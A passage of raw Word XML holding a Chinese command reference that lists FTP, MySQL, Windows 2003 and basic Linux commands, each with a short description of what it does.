        <w:t xml:space="preserve">cdup </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>返回上一级目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">close </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中断与远程服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>会话</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>open</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">open host[port] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建立指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务器连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可指定连接端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">delete </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除远端主机中的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mdelete [remote-files] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除一批文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mkdir directory-name </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在远端主机中建立目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">rename [from] [to] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>改变远端主机中的文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rmdir directory-name </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除远端主机中的目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">status </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示远端主机系统类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">user user-name [password] [account] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>重新以别的用户名登录远端主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">open host [port] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>重新建立一个新的连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">prompt </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>交互提示模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">macdef </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>定义宏命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">lcd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>改变当前本地主机的工作目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果缺省</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>就转到当前用户的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>HOME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">chmod </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>改变远端主机的文件权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>当为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ON</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MGET</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令拷贝的文件名到本地机器中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>全部转换为小写字母</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>cd remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">dir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进入远程主机目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cdup </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进入远程主机目录的父目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在本地机中执行交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>回到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>!ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>＊</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">MYSQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>mysql -h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>主机地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>－</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MYSQL;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果刚安装好</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，超级用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是没有密码的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>（例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>mysql -h110.110.110.110 -Uroot -P123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:u</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可以不用加空格，其它也一样）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">exit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>mysqladmin -u</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>旧密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>新密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">grant select on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">.* to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>登录主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> identified by \"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">\"; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>增加新用户。（注意：和上面不同，下面的因为是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>环境中的命令，所以后面都带一个分号作为命令结束符）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">show databases;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示数据库列表。刚开始时才两个数据库：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>库很重要它里面有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>MYSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>use mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">show tables;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示库中的数据表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">describe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示数据表的结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">create database </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建库</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>库名；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">create table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>字段设定列表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">drop database </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">drop table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表名；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删库和删表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">delete from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将表中记录清空</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示表中的记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">mysqldump --opt school&gt;school.bbb  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>备份数据库：（命令在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\\mysql\\bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>目录下执行）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注释</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>school</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>备份到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>school.bbb</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>school.bbb</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是一个文本文件，文件名任取，打开看看你会有新发现。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>win2003</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统下新增命令（实用部份）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>shutdown /</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>关闭或重启本地或远程主机。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/S </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>关闭主机，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/R </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>重启主机，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /T </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设定延时的时间，范围</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>180</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>秒之间，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t>/A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>取消开机，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/M //IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定的远程主机。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">shutdown /r /t 0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>立即重启本地主机（无延时）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>taskill /</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进程名或进程的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">pid </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>终止一个或多个任务和进程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/PID </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要终止进程的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>pid,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>tasklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令获得各进程的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>pid</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/IM </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要终止的进程的进程名，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/F </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>强制终止进程，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/T </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>终止指定的进程及他所启动的子进程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">tasklist  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(PID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/M </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>列出当前进程加载的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/SVC </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示出每个进程对应的服务，无参数时就只列出当前的进程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统下基本命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要区分大小写</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">uname  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示版本信息（同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> ver</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">dir  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前目录文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">,ls -al </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示包括隐藏文件（同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>win2K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">pwd  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查询当前所在的目录位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>cd  cd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>回到上一层目录，注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>之间有空格。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>返回到根目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看文件内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cat &gt;abc.txt  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>往</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>abc.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件中写上内容。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">more </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以一页一页的方式显示一个文本文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">cp  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制文件</w:t>
      </w:r>
